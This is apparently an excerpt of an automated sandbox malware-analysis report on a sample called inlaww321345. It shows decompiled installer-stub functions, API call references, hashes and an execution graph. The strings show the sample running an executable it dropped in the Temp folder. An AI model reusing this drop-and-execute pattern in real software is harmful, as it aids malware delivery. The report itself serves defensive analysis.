                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3916508600
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}





                    0x00405648
                    0x00405652
                    0x0040566e
                    0x00405690
                    0x00405693
                    0x00405699
                    0x004056a3
                    0x004056a4
                    0x004056a6
                    0x004056ac
                    0x004056ac
                    0x004056b6
                    0x00000000
                    0x004056c4
                    0x0040567b
                    0x004056b3
                    0x004056b3
                    0x00000000
                    0x004056b3
                    0x00405687
                    0x00405689
                    0x00000000
                    0x00405689
                    0x00405658
                    0x00000000
                    0x00000000
                    0x0040565f
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32(?), ref: 00405673
                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                      • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                    • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                    • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                    • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                    0x0040654a
                    0x0040654c
                    0x00406564
                    0x00406569
                    0x0040656e
                    0x004065ac
                    0x004065ac
                    0x00406570
                    0x00406582
                    0x0040658d
                    0x00406593
                    0x0040659e
                    0x00000000
                    0x00000000
                    0x0040659e
                    0x004065b2

                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,004067A3,80000002), ref: 00406582
                    • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68), ref: 0040658D
                    Strings
                    • C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk, xrefs: 00406543
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 3356406503-2769139442
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                    0x004060d3
                    0x004060d5
                    0x004060d8
                    0x00406104
                    0x004060dd
                    0x004060e6
                    0x004060eb
                    0x004060f6
                    0x004060f9
                    0x00406115
                    0x004060fb
                    0x00406102
                    0x00000000
                    0x00406102
                    0x0040610e
                    0x00406112
                    0x00406112
                    0x0040610c
                    0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                    • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:7.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.4%
                    Total number of Nodes:1644
                    Total number of Limit Nodes:98
                    execution_graph 7927 3b4bdf 7930 3b4fc3 7927->7930 7929 3b4bee 7931 3b4fcf _flsall 7930->7931 7932 3b36db __setmbcp 58 API calls 7931->7932 7933 3b4fd7 7932->7933 7934 3b4f1d __setmbcp 58 API calls 7933->7934 7935 3b4fe1 7934->7935 7955 3b4cbe 7935->7955 7938 3b48b1 __malloc_crt 58 API calls 7939 3b5003 7938->7939 7940 3b5130 _flsall 7939->7940 7962 3b516b 7939->7962 7940->7929 7943 3b5039 7945 3b5059 7943->7945 7949 3b4831 _free 58 API calls 7943->7949 7944 3b5140 7944->7940 7946 3b5153 7944->7946 7947 3b4831 _free 58 API calls 7944->7947 7945->7940 7950 3b442f __lock 58 API calls 7945->7950 7948 3b1cc3 __setmbcp 58 API calls 7946->7948 7947->7946 7948->7940 7949->7945 7952 3b5088 7950->7952 7951 3b5116 7972 3b5135 7951->7972 7952->7951 7954 3b4831 _free 58 API calls 7952->7954 7954->7951 7956 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7955->7956 7957 3b4cce 7956->7957 7958 3b4cef 7957->7958 7959 3b4cdd GetOEMCP 7957->7959 7960 3b4d06 7958->7960 7961 3b4cf4 GetACP 7958->7961 7959->7960 7960->7938 7960->7940 7961->7960 7963 3b4cbe getSystemCP 60 API calls 7962->7963 7964 3b5188 7963->7964 7967 3b51d9 IsValidCodePage 7964->7967 7969 3b518f setSBCS 7964->7969 7971 3b51fe _memset __setmbcp_nolock 7964->7971 7965 3b5770 __cftoe_l 6 API calls 7966 3b502a 7965->7966 7966->7943 7966->7944 7968 3b51eb GetCPInfo 7967->7968 7967->7969 7968->7969 7968->7971 7969->7965 7975 3b4d8b GetCPInfo 7971->7975 7985 3b4599 LeaveCriticalSection 7972->7985 7974 3b513c 7974->7940 7976 3b4e6d 7975->7976 7981 3b4dc3 7975->7981 7978 3b5770 __cftoe_l 6 API calls 7976->7978 7977 3b7a55 ___crtGetStringTypeA 61 API calls 7979 3b4e24 7977->7979 7980 3b4f19 7978->7980 7982 3b7917 ___crtLCMapStringA 62 API calls 7979->7982 7980->7969 7981->7977 7983 3b4e45 7982->7983 7984 3b7917 ___crtLCMapStringA 62 API calls 7983->7984 7984->7976 7985->7974 7878 3b33fc 7879 3b340c 7878->7879 7880 3b3431 7878->7880 7879->7880 7885 3b4961 7879->7885 7886 3b496d _flsall 7885->7886 7887 3b36db __setmbcp 58 API calls 7886->7887 7888 3b4972 7887->7888 7889 3b7580 _abort 62 API calls 7888->7889 7890 3b4994 7889->7890 7986 3b16d3 7989 3b344b 7986->7989 7990 3b36f3 __getptd_noexit 58 API calls 7989->7990 7991 3b16e4 7990->7991 7891 3b46f1 7892 3b4869 __calloc_crt 58 API calls 7891->7892 7893 3b46fb EncodePointer 7892->7893 7894 3b4714 7893->7894 7721 3b2690 7722 3b26a2 7721->7722 7724 3b26b0 @_EH4_CallFilterFunc@8 7721->7724 7723 3b5770 __cftoe_l 6 API calls 7722->7723 7723->7724 7895 3b6470 RtlUnwind 7992 3b93d0 7993 3b93da 7992->7993 7994 3b93e6 7992->7994 7993->7994 7995 3b93df CloseHandle 7993->7995 7995->7994 7320 3b1737 7323 3b3ec8 7320->7323 7322 3b173c 7322->7322 7324 3b3eeb 7323->7324 7325 3b3ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7323->7325 7324->7325 7326 3b3eef 7324->7326 7325->7326 7326->7322 7327 3b1f37 7334 3b58ce 7327->7334 7329 3b1f4a 7331 3b4831 _free 58 API calls 7329->7331 7333 3b1f55 7331->7333 7347 3b58d7 7334->7347 7336 3b1f3c 7336->7329 7337 3b5787 7336->7337 7338 3b5793 _flsall 7337->7338 7339 3b442f __lock 58 API calls 7338->7339 7340 3b579f 7339->7340 7341 3b5804 7340->7341 7344 3b57d8 DeleteCriticalSection 7340->7344 7364 3b7c39 7340->7364 7377 3b581b 7341->7377 7346 3b4831 _free 58 API calls 7344->7346 7345 3b5810 _flsall 7345->7329 7346->7340 7348 3b58e3 _flsall 7347->7348 7349 3b442f __lock 58 API calls 7348->7349 7356 3b58f2 7349->7356 7350 3b5990 7360 3b59b2 7350->7360 7352 3b1f9d _flsall 59 API calls 7352->7356 7353 3b599c _flsall 7353->7336 7355 3b5824 82 API calls __fflush_nolock 7355->7356 7356->7350 7356->7352 7356->7355 7357 3b597f 7356->7357 7358 3b2007 __getstream 2 API calls 7357->7358 7359 3b598d 7358->7359 7359->7356 7363 3b4599 LeaveCriticalSection 7360->7363 7362 3b59b9 7362->7353 7363->7362 7365 3b7c45 _flsall 7364->7365 7366 3b7c59 7365->7366 7367 3b7c71 7365->7367 7368 3b1cc3 __setmbcp 58 API calls 7366->7368 7370 3b1f5e __lock_file 59 API calls 7367->7370 7373 3b7c69 _flsall 7367->7373 7369 3b7c5e 7368->7369 7372 3b1e89 __wcsnicmp_l 9 API calls 7369->7372 7371 3b7c83 7370->7371 7380 3b7bcd 7371->7380 7372->7373 7373->7340 7439 3b4599 LeaveCriticalSection 7377->7439 7379 3b5822 7379->7345 7381 3b7bdc 7380->7381 7383 3b7bf0 7380->7383 7384 3b1cc3 __setmbcp 58 API calls 7381->7384 7382 3b7bec 7396 3b7ca8 7382->7396 7383->7382 7399 3b586a 7383->7399 7386 3b7be1 7384->7386 7388 3b1e89 __wcsnicmp_l 9 API calls 7386->7388 7388->7382 7391 3b2873 __fclose_nolock 58 API calls 7392 3b7c0a 7391->7392 7409 3b88a3 7392->7409 7394 3b7c10 7394->7382 7395 3b4831 _free 58 API calls 7394->7395 7395->7382 7397 3b1fcd __wfsopen 2 API calls 7396->7397 7398 3b7cae 7397->7398 7398->7373 7400 3b58a1 7399->7400 7401 3b587d 7399->7401 7405 3b914b 7400->7405 7401->7400 7402 3b2873 __fclose_nolock 58 API calls 7401->7402 7403 3b589a 7402->7403 7404 3b7d99 __write 78 API calls 7403->7404 7404->7400 7406 3b7c04 7405->7406 7407 3b9158 7405->7407 7406->7391 7407->7406 7408 3b4831 _free 58 API calls 7407->7408 7408->7406 7410 3b88af _flsall 7409->7410 7411 3b88bc 7410->7411 7412 3b88d3 7410->7412 7413 3b1c8f __dosmaperr 58 API calls 7411->7413 7414 3b895e 7412->7414 7416 3b88e3 7412->7416 7415 3b88c1 7413->7415 7417 3b1c8f __dosmaperr 58 API calls 7414->7417 7418 3b1cc3 __setmbcp 58 API calls 7415->7418 7419 3b890b 7416->7419 7420 3b8901 7416->7420 7421 3b8906 7417->7421 7430 3b88c8 _flsall 7418->7430 7423 3b6c88 ___lock_fhandle 59 API calls 7419->7423 7422 3b1c8f __dosmaperr 58 API calls 7420->7422 7424 3b1cc3 __setmbcp 58 API calls 7421->7424 7422->7421 7425 3b8911 7423->7425 7426 3b896a 7424->7426 7427 3b892f 7425->7427 7428 3b8924 7425->7428 7432 3b1e89 __wcsnicmp_l 9 API calls 7426->7432 7431 3b1cc3 __setmbcp 58 API calls 7427->7431 7429 3b897e __close_nolock 61 API calls 7428->7429 7433 3b892a 7429->7433 7430->7394 7431->7433 7432->7430 7435 3b8956 7433->7435 7438 3b702e LeaveCriticalSection 7435->7438 7437 3b895c 7437->7430 7438->7437 7439->7379 7896 3b7577 7897 3b17be __lock 58 API calls 7896->7897 7898 3b757e 7897->7898 7440 3bb2a9 7443 3bb2c1 7440->7443 7444 3bb2eb 7443->7444 7445 3bb2d2 7443->7445 7458 3b95d7 7444->7458 7449 3b9549 7445->7449 7448 3bb2bc 7450 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7449->7450 7451 3b956d 7450->7451 7461 3ba184 7451->7461 7456 3b5770 __cftoe_l 6 API calls 7457 3b95d3 7456->7457 7457->7448 7473 3b94a5 7458->7473 7462 3ba1cc 7461->7462 7468 3ba1dc ___mtold12 7461->7468 7463 3b1cc3 __setmbcp 58 API calls 7462->7463 7464 3ba1d1 7463->7464 7465 3b1e89 __wcsnicmp_l 9 API calls 7464->7465 7465->7468 7466 3b5770 __cftoe_l 6 API calls 7467 3b9585 7466->7467 7469 3b96a0 7467->7469 7468->7466 7472 3b96f8 7469->7472 7470 3b5770 __cftoe_l 6 API calls 7471 3b9592 7470->7471 7471->7456 7472->7470 7474 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7473->7474 7475 3b94d2 7474->7475 7476 3ba184 ___strgtold12_l 58 API calls 7475->7476 7477 3b94ea 7476->7477 7482 3b9c12 7477->7482 7480 3b5770 __cftoe_l 6 API calls 7481 3b9545 7480->7481 7481->7448 7484 3b9c6a 7482->7484 7483 3b5770 __cftoe_l 6 API calls 7485 3b9507 7483->7485 7484->7483 7485->7480 7996 3b1ec9 7997 3b1ed1 7996->7997 7998 3b4869 __calloc_crt 58 API calls 7997->7998 7999 3b1eeb 7998->7999 8000 3b4869 __calloc_crt 58 API calls 7999->8000 8001 3b1f04 7999->8001 8000->8001 7486 3ba92c 7489 3ba94d 7486->7489 7488 3ba948 7490 3ba958 7489->7490 7491 3ba9b7 7489->7491 7490->7491 7493 3ba95d 7490->7493 7557 3bae9e 7491->7557 7495 3ba97b 7493->7495 7496 3ba962 7493->7496 7494 3ba99c 7494->7488 7498 3ba99e 7495->7498 7499 3ba985 7495->7499 7503 3bb058 7496->7503 7544 3ba9d3 7498->7544 7522 3bb119 7499->7522 7574 3bc11f 7503->7574 7506 3bb09d 7509 3bb0b5 7506->7509 7510 3bb0a5 7506->7510 7507 3bb08d 7508 3b1cc3 __setmbcp 58 API calls 7507->7508 7511 3bb092 7508->7511 7586 3bbfa7 7509->7586 7512 3b1cc3 __setmbcp 58 API calls 7510->7512 7514 3b1e89 __wcsnicmp_l 9 API calls 7511->7514 7515 3bb0aa 7512->7515 7518 3bb099 7514->7518 7516 3b1e89 __wcsnicmp_l 9 API calls 7515->7516 7516->7518 7517 3bb0e8 7517->7518 7595 3baf6c 7517->7595 7520 3b5770 __cftoe_l 6 API calls 7518->7520 7521 3ba976 7520->7521 7521->7488 7523 3bc11f __fltout2 58 API calls 7522->7523 7524 3bb147 7523->7524 7525 3bb14e 7524->7525 7526 3bb161 7524->7526 7527 3b1cc3 __setmbcp 58 API calls 7525->7527 7528 3bb169 7526->7528 7529 3bb17c 7526->7529 7530 3bb153 7527->7530 7531 3b1cc3 __setmbcp 58 API calls 7528->7531 7532 3bbfa7 __fptostr 58 API calls 7529->7532 7533 3b1e89 __wcsnicmp_l 9 API calls 7530->7533 7534 3bb16e 7531->7534 7535 3bb1a8 7532->7535 7536 3bb15a 7533->7536 7537 3b1e89 __wcsnicmp_l 9 API calls 7534->7537 7535->7536 7539 3bb1ee 7535->7539 7542 3bb1c8 7535->7542 7538 3b5770 __cftoe_l 6 API calls 7536->7538 7537->7536 7540 3bb214 7538->7540 7624 3bad4d 7539->7624 7540->7494 7542->7542 7543 3baf6c __cftof2_l 58 API calls 7542->7543 7543->7536 7545 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7544->7545 7546 3ba9f8 7545->7546 7547 3baa0f 7546->7547 7548 3baa18 7546->7548 7549 3b1cc3 __setmbcp 58 API calls 7547->7549 7551 3baa21 7548->7551 7554 3baa35 7548->7554 7550 3baa14 7549->7550 7553 3b1e89 __wcsnicmp_l 9 API calls 7550->7553 7552 3b1cc3 __setmbcp 58 API calls 7551->7552 7552->7550 7556 3baa30 _memset __alldvrm __cftoa_l _strrchr 7553->7556 7554->7556 7656 3bad2f 7554->7656 7556->7494 7558 3bc11f __fltout2 58 API calls 7557->7558 7559 3baed0 7558->7559 7560 3baee7 7559->7560 7561 3baed7 7559->7561 7562 3baef8 7560->7562 7563 3baeee 7560->7563 7564 3b1cc3 __setmbcp 58 API calls 7561->7564 7568 3bbfa7 __fptostr 58 API calls 7562->7568 7566 3b1cc3 __setmbcp 58 API calls 7563->7566 7565 3baedc 7564->7565 7567 3b1e89 __wcsnicmp_l 9 API calls 7565->7567 7566->7565 7569 3baee3 7567->7569 7570 3baf38 7568->7570 7571 3b5770 __cftoe_l 6 API calls 7569->7571 7570->7569 7572 3bad4d __cftoe2_l 58 API calls 7570->7572 7573 3baf68 7571->7573 7572->7569 7573->7494 7575 3bc148 ___dtold 7574->7575 7602 3bc3bd 7575->7602 7580 3bc18a 7582 3b5770 __cftoe_l 6 API calls 7580->7582 7581 3bc1a0 7583 3b1e99 __invoke_watson 8 API calls 7581->7583 7585 3bb086 7582->7585 7584 3bc1ac 7583->7584 7585->7506 7585->7507 7587 3bbfb9 7586->7587 7588 3bbfcf 7586->7588 7589 3b1cc3 __setmbcp 58 API calls 7587->7589 7588->7587 7592 3bbfd5 7588->7592 7590 3bbfbe 7589->7590 7591 3b1e89 __wcsnicmp_l 9 API calls 7590->7591 7594 3bbfc8 _memmove _strlen 7591->7594 7593 3b1cc3 __setmbcp 58 API calls 7592->7593 7592->7594 7593->7590 7594->7517 7596 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7595->7596 7597 3baf89 7596->7597 7598 3b1cc3 __setmbcp 58 API calls 7597->7598 7601 3bafa5 _memset __shift 7597->7601 7599 3baf9b 7598->7599 7600 3b1e89 __wcsnicmp_l 9 API calls 7599->7600 7600->7601 7601->7518 7605 3bc412 7602->7605 7603 3bc484 7606 3bb7bd __fltout2 58 API calls 7603->7606 7604 3b5770 __cftoe_l 6 API calls 7607 3bc163 7604->7607 7605->7603 7608 3bc424 7605->7608 7609 3bc49d 7605->7609 7606->7608 7615 3bb7bd 7607->7615 7610 3bcd59 7608->7610 7614 3bc435 7608->7614 7612 3bb7bd __fltout2 58 API calls 7609->7612 7611 3b1e99 __invoke_watson 8 API calls 7610->7611 7613 3bcd90 7611->7613 7612->7608 7614->7604 7616 3bb7d6 7615->7616 7617 3bb7c8 7615->7617 7618 3b1cc3 __setmbcp 58 API calls 7616->7618 7617->7616 7622 3bb7ec 7617->7622 7619 3bb7dd 7618->7619 7620 3b1e89 __wcsnicmp_l 9 API calls 7619->7620 7621 3bb7e7 7620->7621 7621->7580 7621->7581 7622->7621 7623 3b1cc3 __setmbcp 58 API calls 7622->7623 7623->7619 7625 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7624->7625 7626 3bad60 7625->7626 7627 3bad6d 7626->7627 7628 3bad76 7626->7628 7629 3b1cc3 __setmbcp 58 API calls 7627->7629 7631 3bad8b 7628->7631 7634 3bad9f __shift 7628->7634 7630 3bad72 7629->7630 7633 3b1e89 __wcsnicmp_l 9 API calls 7630->7633 7632 3b1cc3 __setmbcp 58 API calls 7631->7632 7632->7630 7640 3bad9a _memmove 7633->7640 7635 3bb7bd __fltout2 58 API calls 7634->7635 7636 3bae16 7635->7636 7637 3b1e99 __invoke_watson 8 API calls 7636->7637 7636->7640 7638 3bae9d 7637->7638 7639 3bc11f __fltout2 58 API calls 7638->7639 7641 3baed0 7639->7641 7640->7536 7642 3baee7 7641->7642 7643 3baed7 7641->7643 7644 3baef8 7642->7644 7645 3baeee 7642->7645 7646 3b1cc3 __setmbcp 58 API calls 7643->7646 7650 3bbfa7 __fptostr 58 API calls 7644->7650 7648 3b1cc3 __setmbcp 58 API calls 7645->7648 7647 3baedc 7646->7647 7649 3b1e89 __wcsnicmp_l 9 API calls 7647->7649 7648->7647 7651 3baee3 7649->7651 7652 3baf38 7650->7652 7653 3b5770 __cftoe_l 6 API calls 7651->7653 7652->7651 7654 3bad4d __cftoe2_l 58 API calls 7652->7654 7655 3baf68 7653->7655 7654->7651 7655->7536 7657 3bae9e __cftoe_l 58 API 